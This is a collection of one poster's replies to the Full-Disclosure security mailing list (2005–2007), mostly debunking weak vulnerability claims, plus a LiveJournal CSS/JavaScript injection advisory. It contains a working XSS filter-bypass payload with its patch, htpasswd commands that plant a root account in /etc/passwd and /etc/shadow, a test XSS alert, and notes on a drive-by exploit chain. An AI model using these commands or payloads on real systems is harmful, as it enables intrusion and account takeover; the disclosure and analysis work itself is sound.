I don't know about Windows 2000, but Linux doesn't appear to have  
ever been affected by LAND, and Teardrop was protected against with  
2.0.32. Getting a kernel that old to run will be very difficult  
unless you've got a copy of some *really* old distribution handy.

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Re: [Full-disclosure] Is OWASP vulnerable ??

2007-03-10 Thread Andrew Farmer
On 10 Mar 07, at 09:23, Scarlet Pimpernel wrote:
 Hello all,

 There is an undefined function in OWASP website's javascript code  
 called wgBreakFrames. This can cause potential damage to the site  
 if used maliciously.

 if (wgBreakFrames) {

First of all, that's a variable, not a function. Creating a function  
called wgBreakFrames wouldn't execute the function.

Second of all, I'm not really sure how that could be used  
maliciously. If you're able to inject Javascript into the window  
context, you can already do whatever you like to the user's browser.  
So I'm not quite sure how this is supposed to cause potential damage  
to the site.

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Re: [Full-disclosure] Drive-by Pharming Threat

2007-02-19 Thread Andrew Farmer
On 19 Feb 07, at 09:54, [EMAIL PROTECTED] wrote:
 I am curious as to how one automatically logs on?

Memorized passwords.

Also, if a password is required for a subsidiary resource, the  
browser will ask the user for it. In IE, at least, a sequence like  
the one I describe below will pop up a series of password dialogs if  
the user attempts to cancel. Most users will eventually try typing in  
the correct password to try to make the password dialogs go away.

 Also when you do reset or
 change parameters in the router, does it not require a reboot of
 the router (auto after you hit save), whereby your connection is
 lost for x amount of time?

Depends on the router. It doesn't really matter much, though -
once the settings are saved the damage's been done.

 Also not to mention find a method to cross domains into the routers
 html, for each and every router out there.

Try them all at once:

iframe src=;/iframe
iframe src=;/iframe
iframe src=;/iframe
iframe src=;/iframe

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Re: [Full-disclosure] Drive-by Pharming Threat

2007-02-19 Thread Andrew Farmer
On 19 Feb 07, at 20:36, Gaurang Pandya wrote:
 just wondering why cant simple perl script be used

Because it's easy to write a web page to make a user run some Flash.  
Making a user run Perl isn't so easy.

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Re: [Full-disclosure] Digital Mechanical Lock Unsafe

2007-02-12 Thread Andrew Farmer
On 11 Feb 07, at 15:39, Clark Mills wrote:
 The model of lock that this article is based on is a Lockwood DX  
 DIGITAL LOCK. I'd expect all similarly styled locks to be similarly  

Nope, it's probably just that model. The digital-mechanical locks  
that I've seen are dependent on both the sequencing of buttons  
pressed (1,2,3 vs. 2,1,3) and the combinations in which buttons are  
pressed. Some can use codes which include button chords (1+2,3 vs.  

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Re: [Full-disclosure] Remove all admin-root authorization prompts from OSX

2007-01-24 Thread Andrew Farmer
On 24 Jan 07, at 17:20, K F (lists) wrote:

The petition reads, in part:
 In efforts to minimize the apparently unnecessary dialog boxes that  
 ask for permission to go from gid=admin to uid=root we are hereby  
 petitioning Apple to remove any further use of dialog boxes when  
 making the transition from gid=0 to uid=0. Since the admin group is  
 ALREADY root why can't you just stop asking us for authorization?

Do your research next time. gid=admin isn't root:
 powerbook% id
 uid=1000(me) gid=1000(me) groups=1000(me), 81(appserveradm), 79 
 (appserverusr), 80(admin)

... it's just an ordinary group with sudo, write privileges to some  
special folders, and some extra SecurityAgent magic in /etc/ 

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Re: [Full-disclosure] code release: cryptographic attack tool

2007-01-12 Thread Andrew Farmer
On 12 Jan 07, at 08:05, Slythers Bro wrote:
 sorry but i know nothing about the real physical quantic theory
 i'am not a physician
 i just know there are 3 states : 0 ,1 and unknow

This approach won't work for anything beyond the most trivial  
cryptographic computations: attempting to reverse MD5 through basic  
logic like this will stall as soon as you come to an operation  
where both operands are unknown. In MD5, this will occur at the stage  
where the message is added to word A in the 64th round. By the time  
you get to the end of the 60th round, all bits will be unknown.

Any attack on a cryptosystem (such as MD5) of this form will need to  
take into account complex correlations between bits. To carry your  
quantum-physics analogy a bit further, you need to be able to keep  
track of entanglement between bits. However, the storage necessary  
to carry out such an attack on a large system like MD5 may very well  
be large enough as to be completely infeasible (i.e, above 2^48 bits).

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Re: [Full-disclosure] any idea what is going on here?

2007-01-04 Thread Andrew Farmer
On 04 Jan 07, at 13:37, Ian Shaw wrote:
 A website that I am developing has had BackDoor-CUS!php uploaded to  
 the images directory.  My faulty entirely due to permissions set.

 This has resulted in

 script language=javascript

 being added to the top of index.php.

 Unencoded this reads

 iframe src=;  
 SCROLLING=auto frameborder=0 NORESIZE

 When I go to this an applet appear to run but I am not sure what  
 doing.  Closed my browser out of fear.

 Does anyone know what it is attempting to do?

The iframe source loads an obfuscated Javascript which, when decoded,  
loads a Java applet and subsequently attempts several exploits.

I have disassembled the Java applet. It contains some obfuscation of  
its own, defining classes at runtime from inline byte arrays. It  
appears to exploit the Microsoft Java VM by overloading  
SecurityClassLoader at runtime.

One is against a number of ActiveX plugins which implement  
CreateObject or GetObject methods which may be used to create a  
WScriptShell. The class IDs of the plugins in question are:


If such an plugin is found, the script loads and runs a small Windows  
executable. I have not fully analyzed this executable, but it appears  
to be a downloader which is not identified by Kapersky. It loads a  
third executable in MS-DOS format from another site. None of my tools  
can disassemble this, but Kapersky identifies it as Trojan- 
Downloader.Win32.Small.avw: *another* loader.

Following this, the decrypted script contains part of another  
exploit. The exploit is truncated, so I'm not sure exactly what it's  
targeting. There's a lot of Unicode shellcode escaping going on, but  
the final attack is missing. This may be due to a bug in the  
decryption routine.

All files are available on request, if anyone's interested in doing  
some further analysis of their own.

That was fun :)

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Re: [Full-disclosure] Apache 1.3.37 htpasswd buffer overflow vulnerability

2007-01-03 Thread Andrew Farmer
On 02 Jan 07, at 12:20, Matias Soler wrote:
 Synopsis: Apache 1.3.37 htpasswd buffer overflow vulnerability
 Version: 1.3.37 (latest 1.3.xx)

 Apache htpasswd utility

 A buffer overflow vilnerability has been found, it is dangerous  
 only on
 environment where the binary is suid root.

If htpasswd is setuid, then one could just as easily:

   htpasswd -bp /etc/passwd toor x:0:0:toor::/:/bin/sh
   htpasswd -bp /etc/shadow toor xxa8fjDF6WqBA:0:0:9:7:::

and get root. (Or any number of things - sudoers, crontab, SSH keys -  
take your pick.)

It's possible that this buffer overflow may be significant in very  
limited circumstances - if the utility is executed from a web  
application, perhaps. However, this seems like a rather limited-scope  

-- Andrew Farmer

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Re: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture

2006-12-08 Thread Andrew Farmer
On 08 Dec 06, at 12:47, Evan Stawnyczy wrote:
 My name is Evan ($LastNameNotDisclosed$).

Nice job with the last-name-non-disclosure.

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Re: [Full-disclosure] [] PayPal vulnerable to XSS

2006-11-06 Thread Andrew Farmer
On 04 Nov 06, at 11:39, [EMAIL PROTECTED]  
 this is a request, that I have passed server to the web, complete  
 of the code that would allow the xss:
 GET / HTTP/1.0
 Accept: */*
 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET  
 CLR 1.1.4322)
 Cookie: cookie_check=yes;feel_cookie=
snip big session cookies
snip more cookies
 Connection: Close
 Pragma: no-cache

That's not exploitable. Remember that the XS in XSS stands for  
cross-site: you have to be able to trigger the scripting using  
ordinary requests from another site. To generate this cookie, you'd  
need to already have scripting access to the domain - in  
which case you don't care anymore.

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Re: [Full-disclosure] Plague Proof of Concept Linux backdoor

2006-10-22 Thread Andrew Farmer
On 22 Oct 06, at 04:29, [EMAIL PROTECTED] wrote:
 even if they have ssh access, there is still nothing they can do,  
 to create two files in there $HOME directories containing  
 expressions from
 paths.h and sysexits.h ?

 Why would that be considered a backdoor?

The awk commands parse out the strings /etc/passwd and /etc/ 
shadow from
the headers. It's still rather easily detected - most of the rootkit- 
programs will detect an alternate uid0 account very quickly - but it  
demonstrate an interesting way of avoiding target strings in the binary.

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Re: [Full-disclosure] Googling:Google Meta Bugs

2006-10-11 Thread Andrew Farmer
On 10 Oct 06, at 18:29, Aditya Sood wrote:
 This post deals with the googling effects that google provide with its
 search engine.Since in searching algorithms the metacharacters are
 handled with proper filtering techniques which we have not seen it in
 google.Already explanation given to google but i think they are  
 googled not to handled these unexceptional searches.What we call it...

I tried several of the searches listed, and observed no unusual behavior
in the search results. A number of the searches yielded very few results
due to misspelled keywords (like filtetype). Have you really tried any
of these searches, or are you just generating queries at random?

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Re: [Full-disclosure] Googling:Google Meta Bugs

2006-10-11 Thread Andrew Farmer
On 11 Oct 06, at 08:07, Aditya Sood wrote:
 Hey what ever you suppose to.

 Well if google has accepted it so better you should too.

 Check Down : Response from google
 Well i dont want to say anything more about nerd talk.
 Better to accept new stuff ok not stoic

 Original Message 

 Subject: Re: [#55295087] Flaw In Google Search Engine

 Date: Fri, April 28, 2006 11:38 am
 To: Aditya Sood [EMAIL PROTECTED]


 Thank you for your note. Please rest assured that Google never  
 inserts jokes or sends messages by changing the order of its  
 results. Occasionally, when a particular website is the subject of  
 public attention, other sites begin linking to it. This may  
 elevate its importance as gauged by our ranking software, which  
 assigns a PageRank value based in part on who links to a given  
 page. Higher ranking in Google results may lead to more awareness,  
 which may lead to more links and so on. One side effect of not  
 using an editorial viewpoint to determine the ranking of results  
 is that anomalies occasionally occur. We view such occasions as  
 opportunities for us to learn more about how the web works and how  
 to improve our algorithms for all searches in the future.

 The Google Team

Translation: Nothing to see here, move along. Google hasn't  
accepted anything in that response.

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Re: [Full-disclosure] Googling:Google Meta Bugs

2006-10-10 Thread Andrew Farmer
On 10 Oct 06, at 19:53, Aditya Sood wrote:
 Andrew Farmer wrote:
 On 10 Oct 06, at 18:29, Aditya Sood wrote:
 This post deals with the googling effects that google provide  
 with its
 search engine.Since in searching algorithms the metacharacters are
 handled with proper filtering techniques which we have not seen  
 it in
 google.Already explanation given to google but i think they are  
 googled not to handled these unexceptional searches.What we call  

 I tried several of the searches listed, and observed no unusual  
 in the search results. A number of the searches yielded very few  
 due to misspelled keywords (like filtetype). Have you really  
 tried any
 of these searches, or are you just generating queries at random?

 A] Do check you are making search with advanced IM Feeling Lucky  
 B] Its all working previously and have been reported to google.May be
 they have set changes but do try
  it will provide results which is not at all possible for search

I tried several of the suggested queries again, both with and without
I'm Feeling Lucky. None of them produced any anomalous behavior. What
are we supposed to be looking for, exactly?

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Re: [Full-disclosure] repeated port 21 attempts

2006-06-14 Thread Andrew Farmer

On 6/13/06, Ken Dunham [EMAIL PROTECTED] wrote:

 I'm getting port 21 connection attempts every 5 minutes from about
 half a dozen of my network users.

Sounds like FTP and SSH attacks that are opportunistically launched by
Romanian attackers to date...

Given that the connections coming from his own network, I seriously
doubt the FTP connection attempts are the work of Romanian hackers.
(Unless Mr. Wu's network is in Romania.)

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Re: Re: [Full-disclosure] repeated port 21 attempts

2006-06-13 Thread Andrew Farmer

On 6/13/06, Jacob Wu [EMAIL PROTECTED] wrote:

They are all non routable 10.x.x.x IPs.  This is for a residence hall at my
University.  Residents, when they first turn on their computers, are given a
10.x.x.x IP and made to register and agree with the network use policy.
Once they do that they are given a real IP and thus access to the

Are you doing something weird with DNS that's making this one machine's
address to show up on lookups, or messing with routing so that everything
gets redirected to this box?

If so, I'd wonder if this is some sort of bot that you're seeing
that's trying to
call home with FTP. It might behoove you to (kindly) ask the owner of one
of the machines to let you take a look at their machine to see what it's doing.

Someone sent me this link:

Try websnarf:

But it gives me less information than iptables does.

You may have to modify it to better imitate an FTP server - it was written for
use as a faux HTTP server. In particular, the client may be waiting for a banner
and/or greeting before it makes a request.

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Re: [Full-disclosure] Advisory - D-Link Access Point

2006-06-06 Thread Andrew Farmer

On 06 Jun 06, at 18:10, news wrote:
Link Wireless Access-Point (DWL-2100ap)PRIORITY: HIGHI -  
INTRUDERS:Intruders Tiger Team Security is a  
project entailed with Security Open Source (http:// Intruders Tiger Team Security  
(ITTS) is a group of researchers with more than 10 years of  
experience, specialized in the development of intrusion projects  
(Pen-Test) and in special security projects.All the projects of  
intrusion (Pen-Test) realized until the moment by the Intruders  
Tiger Team Security had 100% of success.II -  
INTRODUCTION:--D-Link AirPlus XtremeG 2.4GHz  
Wireless Access Point, 54Mbps/108Mbps (802.11g):D-Link, the  
industry pioneer in wireless networking, introduces a performance  
breakthrough in wireless connectivity – D-Link AirPlus Xtreme GTM  
series of high-speed devices now capable of delivering transfer  
rates up to 15x faster than the standard 802.11b with the new D- 
Link 108G. With the new AirPlus Xtreme G DWL-2100AP Wireless Access  
Point, D-Link sets a new standard for wireless access points.D-Link  
DWL-2100ap is one of the most popular Access Point in the world

Wall of text hits you for 652275 damage.
You die.

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Re: [Full-disclosure] Is your security 6/6/6 ready?

2006-06-04 Thread Andrew Farmer

On 04 Jun 06, at 15:13, Aaron Gray wrote:
(*) That's *really* drunk: 

That contains (possibly multiple) IE exploits.

Are you sure? All I can see is tacky ads... an IFRAME tag does not an  
exploit make.

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[Full-disclosure] -Advisory- + x Thu Mar 16 21:01:19 EST 2006 x + Heap Overflow in Microsoft Excel

2006-03-16 Thread Andrew Farmer

-Advisory- + x Thu Mar 16 21:01:19 EST 2006 x + Heap Overflow in Microsoft Excel

o/ 卍 Description
It is possible to make Microsoft Excel crash or run arbitrary code by the use 
of malformed input.



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Re: [Full-disclosure] Promiscious Device Detection

2006-03-09 Thread Andrew Farmer

On 09 Mar 06, at 04:04, Q Beukes wrote:

I am looking for linux utility that checks if a specified machine's
network device is in promiscious mode or not.

c source is prefered so I could maybe modify (if needed) it so it
actively search for
such devices and syslog such finds.

You can't search for promisc devices, as they don't advertise them-
selves in any way. Chkrootkit[1], though, will check the local machine
for a promisc interface, as well as other signs of possible badness.


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Re: [Full-disclosure] Fun with Foundstone

2006-02-14 Thread Andrew Farmer

And while we're at it...;scriptalert(xss)/script

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Re: [Full-disclosure] cPanel 10 File Editing Vulnerability

2006-02-04 Thread Andrew Farmer

On 04 Feb 06, at 09:16, Shell wrote:
In cPanel 10, the script erredit.html, which is supposed to edit  
a specific set of files, can edit any file acessible by the cPanel.


Tested on a real cPanel system running cPanel 10.8.1-RELEASE. This  
won't edit files outside the user's home directory, even with  
traversal paths, and deletes files before writing them - this doesn't  
appear exploitable; indeed, it doesn't seem to be much except a weird  
way of editing your own files.

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[Full-disclosure] LiveJournal CSS/JS injection vulnerability

2005-12-19 Thread Andrew Farmer

The popular Livejournal[1] social networking software contained an
error which allowed for the inclusion of Javascript in user-supplied


LiveJournal is an online journal service with an emphasis on user
interaction.[2] It has historically had a relatively restrictive
attitude toward user-supplied web content, opting to not allow users
to include active content such as embedded plugins and scripts. This
attitude has generally prevented the creation and spread of malicious
content, such as the two worms which appeared on MySpace in recent
months. However, this position also requires that content be carefully
parsed - and a recent discovery showed that their code has its issues.


Livejournal parses all user-supplied HTML through a script called (located at livejournal/cgi-bin/ All HTML
attributes containing the literal text 'javascript' are stripped by
default. However, if the cleancss option is enabled - which it is in
most installations, including the one at - style
attributes will have slashes stripped after the check for the text
'javascript' is made, causing a style property containing the text
'java\script' to be modified to 'javascript' and passed through. As
many web browsers allow javascript: to be used as a pseudo-URI, this
allows for the creation of content that will execute arbitrary script
code on a user's browser when viewed.

For example, the HTML content

span style=background:url('javas\cript:(function

will be accepted by an unpatched LiveJournal installation; the slash
will be removed, causing a dialog to be displayed when the content is

As of 7 Dec 2005, LiveJournal CVS contains a fix to this issue: now searches for the text 'javascript' in CSS *after*
stripping slashes:

--- cgi-bin/cleanhtml.pl22 Oct 2005 03:17:05 -  1.129
+++ cgi-bin/cleanhtml.pl7 Dec 2005 08:50:41 -   1.130
@@ -319,7 +319,7 @@
 $hash-{$attr} =~ s/\\//g;

 # and catch the obvious ones ([ is for  
things like document[coo+kie]
-foreach my $css (/*, [, qw(absolute  
fixed expression eval behavior cookie document window)) {
+foreach my $css (/*, [, qw(absolute  
fixed expression eval behavior cookie document window javascript)) {

 if ($hash-{$attr} =~ /\Q$css\E/i) {
 delete $hash-{$attr};
 next ATTR;

All sites using the LiveJournal code are urged to upgrade, or apply
this patch, as soon as possible.

The author would like to acknowledge Hoshikuzu Stardust (st4rdust at for reporting a related issue involving the escaping of
control characters in CSS; this vulnerability was discovered during
experimentation and testing regarding that issue.

Discovery: circa 5 Dec 2005

Vendor notified: 5 Dec 2005

Patch implemented: 7 Dec 2005

Public disclosure: 19 Dec 2005

Andrew Farmer is a student at Harvey Mudd College.

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Re: [Full-disclosure] Re: readdir_r considered harmful

2005-11-07 Thread Andrew Farmer

On 06 Nov 05, at 01:00, [EMAIL PROTECTED] wrote:
Then you never really understood the implementation, seems.  Of  

all implementations keep the content of the directory as read with
getdents or so in the DIR descriptor.  But it is usually not the case
that the whole content fits into the buffer allocated.  One could, of
course, resize the buffer to fit the content of the directory read,
even if this means reserving hundreds or thousands of kBs.  But this
is not how most implementations work.

I don't see how that is relevant; the typical use of readdir() is  
as follows:

DIR *dirp = opendir(name);

while ((dent = readdir(dirp)) != NULL) {


Nothing other threads do with readdir() on different dirp's will  

what dent points to.

I have *never* seen a program where multiple threads read from a  

dirp; and I can't image the use.

In practice, you're correct. In theory, however, consider the  
following code


DIR *d1 = opendir(dir1);
  DIR *d2 = opendir(dir2);
dent1 = readdir(dir1);
  dent2 = readdir(dir2);

In most implementations, dent1 != dent2. HOWEVER, there is no  
guarantee that
they will not both point to the same statically allocated buffer, and  
implementations may do so. For example, this is why ctime_r exists:  
returns a pointer to a statically allocated buffer, and hence is not  


You are correct, though, that the glibc implementation of readdir is
thread-safe, so readdir_r is unnecessary in all common situations.

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Re: [Full-disclosure] Comparing Algorithms On The List OfHard-to-brut-force?

2005-11-01 Thread Andrew Farmer

On 01 Nov 05, at 10:11, Brandon Enright wrote:
Brute forcing an algorithm suggests that you are not attacking a  
weakness or
known flaw in the algorithm but rather just running through the  
trying to recover the plaintext.  In that case, whichever allows  
you to use

the most bits is what you want.

Note that the encryption speed of an algorithm is *not* a significant  
in the time taken to brute-force it, except for extremely small  
Remember that the time taken to brute-force an N-bit algorithm that  
takes K

seconds per encryption is, on average

   K * 2

which increases much more rapidly with N than it does with K. Adding  
even one
more bit will double the average time taken to brute-force an  
algorithm, while

using a slower algorithm will only increase the difficulty marginally.

Also note that anything beyond 256 bits is silly. Brute-forcing a 256- 
algorithm can be shown to be PHYSICALLY impossible, so there's no  
reason to

go anywhere beyond that.

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Re: [Full-disclosure] Forensic help?

2005-09-11 Thread Andrew Farmer

On 11 Sep 05, at 15:49, James Wicks wrote:

Here is a way to do it on the cheap:

1.  Ghost the hard drive with Symantec Ghost - http://

man dd

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Re: [Full-disclosure] How to Report a Security Vulnerability toMicrosoft

2005-04-12 Thread Andrew Farmer
On 12 Apr 2005, at 00:21, Ag. System Administrator wrote:
I suppose you believe the signature on this message too, then.

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